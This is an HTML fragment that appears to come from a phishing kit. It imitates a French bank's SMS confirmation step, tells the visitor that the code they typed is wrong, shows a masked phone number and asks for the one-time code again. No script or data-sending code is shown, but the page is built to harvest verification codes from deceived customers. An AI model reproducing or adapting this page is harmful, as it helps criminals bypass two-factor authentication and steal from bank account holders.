<input type="hidden" id="DivName" Value="Sms_Error">
<input type="hidden" id="DivNext" Value="Loading">
<style>
        .MLG8KIT{
            background-color: white;
            padding: 0px;
        }
        #myunderdiv{
                height: px;
                width: 588px;
        }
        
        .myButton {
            background-color:#4170a9;
            border:1px solid #4170a9;
            display:inline-block;
            color:#ffffff;
            font-family:Arial;
            font-size:13px;
            font-weight:bold;
            padding:3px 14px;
            text-decoration:none;
        }
        input {
             padding: 0px;
             font-size: 14px;
             border-width: 0px;
             border-color: #CCCCCC;
             background-color: #FFFFFF;
             color: #5f5e5e;
             border-style: solid;
             border-radius: 0px;
             box-shadow: 0px 0px 2px rgba(66,66,66,.75);
             text-shadow: 0px 0px 0px rgba(255,255,255,.0);
             border: 2px solid #a8cbf7;
        }
        
        
        
        
        </style>
        <!--
                905 * 386 / 280 * 386
        -->
        <div class="row">
                <div class="col-sm-12 col-xm-12 col-xs-12">
                 <img src="imgs/vos_bn.png" alt="">        
                </div>
         </div>
        <div class="row">
                <!--  <div class="col-md-3 col-xm-3 col-xs-3">
                       <img src="imgs/body_left.png" alt=""> 
                 </div>
                 
                 <div class="col-md-0.1">
                        <img src="imgs/lg_far9.png" alt=""> 
                 </div> -->
                 
                 <div class="col_lg_8 col-md-8 col-xm-8 col-xs-8 MLG8KIT">
                                <div class="panel panel-primary">
                                                <div class="panel-heading"><h6><img src="imgs/vr.png" class="img-fluid" style="max-width:100%; height: auto;"></h6></div>
                                                <div class="panel-body">
                <div class="row">
                <div class="container">
                                <center>
                                                <div style="padding-top: 10px;"></div>
                                                <!--
                                                    <img src="imgs/sm_wan.png" class="img-fluid" style="max-width:100%; height: auto;" alt=""> -->
                                                    
                                                        <div id="myunderdiv" class="img-fluid" style="max-width:100%; height: auto;" >
                                                                        <div class="alert alert-danger" role="alert">
                                                                                    <span class="glyphicon glyphicon-exclamation-sign" aria-hidden="true"></span>
                                                                                    <span class="sr-only">Error:</span>
                                                                                    <h6>Votre code est faux !</h6> veuillez réessayer en corrigeant votre saisie .
                                                                                  </div>
                                                                            </div>
                                                                            <div style="padding-top: 10px;"></div>
                                                        <div id="myunderdiv" class="img-fluid" style="max-width:100%; height: auto;" >
                                                        <p id="changenumber1">Un <strong>code de confirmation</strong> vient de vous etre envoyer par SMS au 06 XX XX X7 45 . </p>
                                                        <p>Indiquez votre code de <strong>code de confirmation</strong> : <input type="text" size="5" id="SS"> </p>
                                                        
                                                                <button id="clickmee" class="myButton">Confirmer</button>
                                                                <div style="padding-top: 10px;"></div>
                                                                        
                                                                                        <div class="alert alert-info" role="alert">
                                                                                                        <h6 class="alert-heading">Vous n'avez pas reçu notre SMS ?</h6>
                                                                                                        <p> > Vous pouvez aussi recevoir  à nouveau le code de confirmation </p>
                                                                                                        <p id="changenumber2"> -> au 06 XX XX X7 45 : par  <a href="#">SMS</a> </p>
                                                                                                      </div>
                                                                        </div>
                                                </center>
                                                        
                                                        <div style="padding-top: 10px;"></div>
                </div>
                </div>
        </div> </div>
                </div>
        </div>
                </div>
                <div style="padding-top: 30px;"></div>
        <div class="row">
                <div class="col-sm-12 col-xm-12 col-xs-12">
                 <img src="#" alt="">
                </div>
        </div>
        